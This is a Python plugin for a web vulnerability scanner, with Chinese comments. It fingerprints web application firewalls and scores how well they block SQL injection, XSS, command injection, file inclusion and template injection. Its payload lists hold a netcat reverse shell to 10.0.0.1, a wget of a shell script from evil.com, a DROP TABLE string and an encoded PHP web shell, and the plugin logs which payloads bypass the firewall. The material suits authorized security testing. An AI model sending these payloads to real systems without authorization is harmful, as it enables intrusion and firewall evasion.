"""
plugins/info/waf_check.py — WAF / Web 防火墙探测 + 多维敏感度热力图

检测逻辑：
  1. 发送包含经典攻击 payload 的请求 (<script>, ' OR 1=1--, etc.)
  2. 分析响应状态码 (403 / 406 / 501 / 999)
  3. 分析响应头指纹 (Server, X-Powered-By, 自定义头)
  4. 分析响应 body 中的拦截页关键词
  5. 匹配已知 WAF 指纹库

企业级增强 — 多维 WAF 敏感度热力图:
  • 不再只是 "检测到/未检测到" 的二元判定
  • 量化评估 WAF 对 SQLi, XSS, RCE, LFI, SSTI 等维度的防护水位
  • 生成防御能力矩阵 (Capability Matrix)
  • 识别 WAF 的绕过盲区，为后续 POC 测试提供策略指导

支持检测的 WAF:
  Cloudflare, ModSecurity, Safedog, Imperva/Incapsula,
  Akamai, AWS WAF, Barracuda, Fortinet, 360, 宝塔 等
"""

from __future__ import annotations

import logging
import re
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Tuple

import httpx

from core.request import AsyncRequester
from plugins.base import BasePlugin, PluginMeta, ScanResult, Severity

logger = logging.getLogger("openscanner.plugin.waf_check")


# ─────────────────────────────────────────────
# WAF 指纹定义
# ─────────────────────────────────────────────
@dataclass(frozen=True)
class WafSignature:
    """WAF 指纹规则"""

    name: str
    # 响应头匹配：{header_name: regex_pattern}
    header_patterns: Dict[str, str]
    # 响应体关键词
    body_patterns: List[str]
    # 特殊状态码
    status_codes: List[int]


# 已知 WAF 指纹库
_WAF_SIGNATURES: List[WafSignature] = [
    WafSignature(
        name="Cloudflare",
        header_patterns={
            "Server": r"cloudflare",
            "CF-RAY": r".+",
            "cf-cache-status": r".+",
        },
        body_patterns=[
            "Attention Required! | Cloudflare",
            "cloudflare-nginx",
            "cf-browser-verification",
            "DDoS protection by Cloudflare",
        ],
        status_codes=[403, 503],
    ),
    WafSignature(
        name="ModSecurity",
        header_patterns={
            "Server": r"mod_security|NOYB",
        },
        body_patterns=[
            "ModSecurity",
            "This error was generated by Mod_Security",
            "mod_security",
            "NOYB",
        ],
        status_codes=[403, 406, 501],
    ),
    WafSignature(
        name="Safedog (安全狗)",
        header_patterns={
            "X-Powered-By": r"WAF/2\.0",
            "Server": r"Safedog",
        },
        body_patterns=[
            "safedogsite",
            "safe dog",
            "网站防火墙",
            "safedog",
        ],
        status_codes=[403],
    ),
    WafSignature(
        name="Imperva / Incapsula",
        header_patterns={
            "X-CDN": r"Incapsula",
            "X-Iinfo": r".+",
        },
        body_patterns=[
            "Incapsula incident ID",
            "Powered by Incapsula",
            "/_Incapsula_Resource",
        ],
        status_codes=[403],
    ),
    WafSignature(
        name="AWS WAF",
        header_patterns={
            "x-amzn-RequestId": r".+",
        },
        body_patterns=[
            "Request blocked",
            "AWS WAF",
        ],
        status_codes=[403],
    ),
    WafSignature(
        name="Akamai Kona",
        header_patterns={
            "Server": r"AkamaiGHost",
        },
        body_patterns=[
            "Reference&#32;&#35;",
            "Access Denied",
            "akamaighost",
        ],
        status_codes=[403],
    ),
    WafSignature(
        name="Barracuda",
        header_patterns={
            "Server": r"Barracuda",
        },
        body_patterns=[
            "Barracuda Web Application Firewall",
            "barra_counter_session",
        ],
        status_codes=[403],
    ),
    WafSignature(
        name="Fortinet FortiWeb",
        header_patterns={
            "Server": r"FortiWeb",
        },
        body_patterns=[
            "FortiWeb",
            ".fgd_icon",
            "fortigate",
        ],
        status_codes=[403],
    ),
    WafSignature(
        name="360 网站卫士",
        header_patterns={
            "X-Powered-By-360WZB": r".+",
        },
        body_patterns=[
            "360wzb",
            "wangzhan.360.cn",
            "360网站卫士",
        ],
        status_codes=[403, 493],
    ),
    WafSignature(
        name="宝塔 WAF",
        header_patterns={},
        body_patterns=[
            "宝塔网站防火墙",
            "BT.cn",
            "btpanel",
        ],
        status_codes=[403],
    ),
    WafSignature(
        name="Sucuri",
        header_patterns={
            "Server": r"Sucuri",
            "X-Sucuri-ID": r".+",
        },
        body_patterns=[
            "Sucuri WebSite Firewall",
            "Access Denied - Sucuri Website Firewall",
            "sucuri.net/privacy-policy",
        ],
        status_codes=[403],
    ),
    WafSignature(
        name="F5 BIG-IP ASM",
        header_patterns={
            "Server": r"BigIP|BIG-IP",
        },
        body_patterns=[
            "The requested URL was rejected",
            "Please consult with your administrator",
        ],
        status_codes=[403],
    ),
]

# 探测用 payload（故意触发 WAF 拦截）
_PROBE_PAYLOADS: List[Dict[str, str]] = [
    {"probe": "<script>alert(1)</script>"},
    {"probe": "' OR 1=1--"},
    {"probe": "' UNION SELECT NULL,NULL--"},
    {"probe": "../../../etc/passwd"},
    {"probe": "${7*7}{{7*7}}"},
    {"probe": '"><img src=x onerror=alert(1)>'},
]


# ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# 多维 WAF 敏感度热力图
# ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

@dataclass
class AttackVector:
    """单个攻击向量的测试定义"""
    dimension: str           # 攻击维度 (SQLi, XSS, RCE, LFI, SSTI)
    payloads: List[str]      # 测试 Payload 集合
    description: str = ""    # 维度描述


@dataclass
class DimensionResult:
    """单个维度的检测结果"""
    dimension: str
    total_probes: int = 0
    blocked_count: int = 0
    passed_count: int = 0
    block_rate: float = 0.0      # 拦截率 [0.0, 1.0]
    protection_level: str = ""   # 防护等级: 强/中/弱/无
    bypassed_payloads: List[str] = field(default_factory=list)  # 绕过的 Payload

    def to_dict(self) -> Dict[str, Any]:
        return {
            "dimension": self.dimension,
            "total_probes": self.total_probes,
            "blocked": self.blocked_count,
            "passed": self.passed_count,
            "block_rate": round(self.block_rate * 100, 1),
            "protection_level": self.protection_level,
            "bypassed_payloads": self.bypassed_payloads[:5],
        }


@dataclass
class WafHeatmap:
    """WAF 多维敏感度热力图"""
    waf_names: List[str] = field(default_factory=list)
    dimensions: List[DimensionResult] = field(default_factory=list)
    overall_score: float = 0.0        # 总体防护评分 [0.0, 100.0]
    weakest_dimension: str = ""       # 最薄弱维度
    strongest_dimension: str = ""     # 最强维度

    def to_dict(self) -> Dict[str, Any]:
        return {
            "waf_names": self.waf_names,
            "overall_score": round(self.overall_score, 1),
            "weakest_dimension": self.weakest_dimension,
            "strongest_dimension": self.strongest_dimension,
            "dimensions": [d.to_dict() for d in self.dimensions],
        }


# 多维攻击向量定义
_ATTACK_VECTORS: List[AttackVector] = [
    AttackVector(
        dimension="SQLi (SQL 注入)",
        description="SQL 注入攻击防护能力",
        payloads=[
            "' OR 1=1--",
            "' UNION SELECT 1,2,3--",
            "1' AND SLEEP(5)--",
            "'; DROP TABLE users--",
            "' OR '1'='1' /*",
            "1 AND 1=CONVERT(int, @@version)--",
            "' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--",
            "%27%20OR%201%3D1--",               # URL 编码
            "'/**/OR/**/1=1--",                  # 注释绕过
            "' /*!50000OR*/ '1'='1",             # MySQL 内联
        ],
    ),
    AttackVector(
        dimension="XSS (跨站脚本)",
        description="跨站脚本攻击防护能力",
        payloads=[
            "<script>alert(1)</script>",
            "<img src=x onerror=alert(1)>",
            "<svg/onload=alert(1)>",
            "javascript:alert(1)",
            "\" autofocus onfocus=alert(1)>",
            "<ScRiPt>alert(1)</ScRiPt>",         # 大小写变异
            "%3Cscript%3Ealert(1)%3C/script%3E", # URL 编码
            "<iframe src='javascript:alert(1)'>",
            "'-confirm(1)-'",
            "<details open ontoggle=alert(1)>",
        ],
    ),
    AttackVector(
        dimension="RCE (远程命令执行)",
        description="远程命令执行攻击防护能力",
        payloads=[
            "; ls -la",
            "| cat /etc/passwd",
            "`whoami`",
            "$(id)",
            "; ping -c 1 127.0.0.1",
            "| nc -e /bin/sh 10.0.0.1 4444",
            "%3B%20ls",                          # URL 编码
            "|| wget http://evil.com/shell.sh",
            ";{cat,/etc/passwd}",                # 花括号绕过
            "a]||[$(id)]",
        ],
    ),
    AttackVector(
        dimension="LFI/RFI (文件包含)",
        description="本地/远程文件包含攻击防护能力",
        payloads=[
            "../../../etc/passwd",
            "....//....//....//etc/passwd",       # 双写绕过
            "..%252f..%252f..%252fetc/passwd",    # 双重编码
            "/etc/passwd%00",                     # Null byte
            "php://filter/convert.base64-encode/resource=index",
            "file:///etc/passwd",
            "expect://id",
            "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk/Pg==",
            "..\\..\\..\\windows\\win.ini",       # Windows 路径
            "%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",  # UTF-8 编码
        ],
    ),
    AttackVector(
        dimension="SSTI (模板注入)",
        description="服务端模板注入攻击防护能力",
        payloads=[
            "{{7*7}}",
            "${7*7}",
            "#{7*7}",
            "<%= 7*7 %>",
            "{{''.__class__.__mro__}}",
            "${T(java.lang.Runtime).getRuntime().exec('id')}",
            "{{config.items()}}",
            "{{request.application.__globals__}}",
            "{% import os %}{{ os.popen('id').read() }}",
            "{{range.constructor('return global')()}}",
        ],
    ),
]

# WAF 拦截状态码
_BLOCK_STATUS_CODES = {403, 406, 429, 444, 451, 493, 501, 503, 999}


class WafCheckPlugin(BasePlugin):
    """
    WAF / 防火墙探测插件 + 多维敏感度热力图

    通过发送多种攻击 payload 触发 WAF 拦截，
    然后匹配响应指纹库判断 WAF 类型。
    最后执行多维度攻击向量测试，生成防御能力矩阵。
    """

    meta = PluginMeta(
        name="waf_check",
        display_name="WAF Detector & Heatmap",
        description="探测目标是否部署 Web 应用防火墙，识别 WAF 类型，并生成多维防御能力热力图",
        severity=Severity.INFO,
        tags=["recon", "waf", "fingerprint", "heatmap"],
        version="2.0.0",
    )

    async def check(
        self,
        url: str,
        requester: AsyncRequester,
        context: Optional[Dict[str, Any]] = None,
    ) -> ScanResult:
        """
        主检测流程:
            1. 先用干净请求获取基线响应
            2. 依次发送 payload 触发 WAF
            3. 匹配指纹库
            4. 执行多维度敏感度测试 → 生成热力图
        """
        logger.info("[WAF] 开始探测: %s", url)

        # Step 1: 基线请求 — 正常响应
        try:
            baseline = await requester.get(url)
            baseline_status = baseline.status_code
        except Exception:
            baseline_status = -1

        # Step 2: 发送 payload 收集异常响应
        detections: List[Tuple[str, str]] = []  # [(waf_name, evidence), ...]

        for payload in _PROBE_PAYLOADS:
            try:
                resp = await requester.get(url, params=payload)
                matched = self._match_signatures(resp)
                for waf_name, evidence in matched:
                    detections.append((waf_name, evidence))

                # 如果状态码从 2xx 变成 403/406 等，本身就是 WAF 存在的证据
                if baseline_status in range(200, 400) and resp.status_code in (
                    403, 406, 429, 493, 501, 999,
                ):
                    detections.append(
                        (
                            "Unknown WAF",
                            f"状态码异变: {baseline_status} → {resp.status_code} "
                            f"(payload={payload.get('probe', '')})",
                        )
                    )

            except Exception as exc:
                logger.debug("[WAF] payload 请求异常: %s → %s", payload, exc)
                continue

        # Step 3: 整理结果
        if not detections:
            logger.info("[WAF] 未检测到 WAF: %s", url)
            return self.result(
                url,
                is_vulnerable=False,
                detail="未检测到 WAF / 防火墙",
            )

        # 去重 WAF 名称
        seen_wafs: Dict[str, List[str]] = {}
        for waf_name, evidence in detections:
            seen_wafs.setdefault(waf_name, []).append(evidence)

        waf_names = list(seen_wafs.keys())
        summary = "; ".join(
            f"{name} (证据×{len(evs)})" for name, evs in seen_wafs.items()
        )

        logger.info("[WAF] 检测到 WAF: %s → %s", url, summary)

        # ═══════════════════════════════════════
        # Step 4: 多维 WAF 敏感度热力图
        # ═══════════════════════════════════════
        heatmap = await self._build_heatmap(url, requester, baseline_status)

        # 热力图摘要信息
        heatmap_summary = ""
        if heatmap.dimensions:
            heatmap_summary = (
                f"\n\n📊 WAF 防御能力热力图:\n"
                f"  总体评分: {heatmap.overall_score:.1f}/100\n"
                f"  最强维度: {heatmap.strongest_dimension}\n"
                f"  最弱维度: {heatmap.weakest_dimension}\n"
            )
            for dim in heatmap.dimensions:
                bar = self._ascii_bar(dim.block_rate)
                heatmap_summary += (
                    f"  {dim.dimension}: {bar} "
                    f"{dim.block_rate*100:.0f}% [{dim.protection_level}]\n"
                )

        return self.result(
            url,
            is_vulnerable=True,
            detail=f"检测到 WAF: {', '.join(waf_names)}{heatmap_summary}",
            evidence=summary,
            extra={
                "waf_list": waf_names,
                "raw_detections": seen_wafs,
                "heatmap": heatmap.to_dict(),
            },
        )

    # ── 多维热力图构建 ────────────────────────

    async def _build_heatmap(
        self,
        url: str,
        requester: AsyncRequester,
        baseline_status: int,
    ) -> WafHeatmap:
        """
        执行多维度攻击向量测试，构建 WAF 敏感度热力图。

        对 SQLi, XSS, RCE, LFI, SSTI 五个维度分别发送探测 Payload，
        统计每个维度的拦截率并评定防护等级。
        """
        heatmap = WafHeatmap()
        all_block_rates: List[Tuple[str, float]] = []

        for vector in _ATTACK_VECTORS:
            dim_result = DimensionResult(
                dimension=vector.dimension,
                total_probes=len(vector.payloads),
            )

            for payload in vector.payloads:
                try:
                    resp = await requester.get(url, params={"test": payload})
                    if resp.status_code in _BLOCK_STATUS_CODES:
                        dim_result.blocked_count += 1
                    else:
                        dim_result.passed_count += 1
                        dim_result.bypassed_payloads.append(payload)
                except Exception:
                    dim_result.blocked_count += 1  # 连接被重置也算拦截

            # 计算拦截率
            if dim_result.total_probes > 0:
                dim_result.block_rate = (
                    dim_result.blocked_count / dim_result.total_probes
                )

            # 评定防护等级
            if dim_result.block_rate >= 0.90:
                dim_result.protection_level = "🟢 强防护"
            elif dim_result.block_rate >= 0.60:
                dim_result.protection_level = "🟡 中等防护"
            elif dim_result.block_rate >= 0.30:
                dim_result.protection_level = "🟠 弱防护"
            else:
                dim_result.protection_level = "🔴 无防护"

            heatmap.dimensions.append(dim_result)
            all_block_rates.append((vector.dimension, dim_result.block_rate))

            logger.info(
                "[WAF/Heatmap] %s: 拦截 %d/%d (%.0f%%) [%s]",
                vector.dimension,
                dim_result.blocked_count,
                dim_result.total_probes,
                dim_result.block_rate * 100,
                dim_result.protection_level,
            )

        # 总体评分 (各维度平均拦截率)
        if all_block_rates:
            avg_rate = sum(r for _, r in all_block_rates) / len(all_block_rates)
            heatmap.overall_score = avg_rate * 100

            # 最弱/最强维度
            sorted_rates = sorted(all_block_rates, key=lambda x: x[1])
            heatmap.weakest_dimension = sorted_rates[0][0]
            heatmap.strongest_dimension = sorted_rates[-1][0]

        return heatmap

    @staticmethod
    def _ascii_bar(rate: float) -> str:
        """生成 ASCII 进度条"""
        filled = int(rate * 10)
        empty = 10 - filled
        return "█" * filled + "░" * empty

    # ── 内部匹配逻辑 ────────────────────────

    def _match_signatures(
        self, resp: httpx.Response
    ) -> List[Tuple[str, str]]:
        """将响应与指纹库逐一匹配"""
        matches: List[Tuple[str, str]] = []
        resp_headers = {k.lower(): v for k, v in resp.headers.items()}
        resp_text = resp.text.lower() if resp.text else ""

        for sig in _WAF_SIGNATURES:
            # 响应头匹配
            for header, pattern in sig.header_patterns.items():
                header_val = resp_headers.get(header.lower(), "")
                if header_val and re.search(
                    pattern, header_val, re.IGNORECASE
                ):
                    matches.append(
                        (
                            sig.name,
                            f"Header [{header}: {header_val}] 匹配 /{pattern}/",
                        )
                    )

            # 响应体关键词匹配
            for keyword in sig.body_patterns:
                if keyword.lower() in resp_text:
                    matches.append(
                        (
                            sig.name,
                            f"Body 包含关键词: {keyword!r}",
                        )
                    )

            # 状态码匹配（辅助依据，不单独作为判定）
            if resp.status_code in sig.status_codes:
                # 仅当 header 或 body 也命中时才增加状态码证据
                if any(name == sig.name for name, _ in matches):
                    matches.append(
                        (
                            sig.name,
                            f"状态码 {resp.status_code} 在 WAF 特征码列表中",
                        )
                    )

        return matches
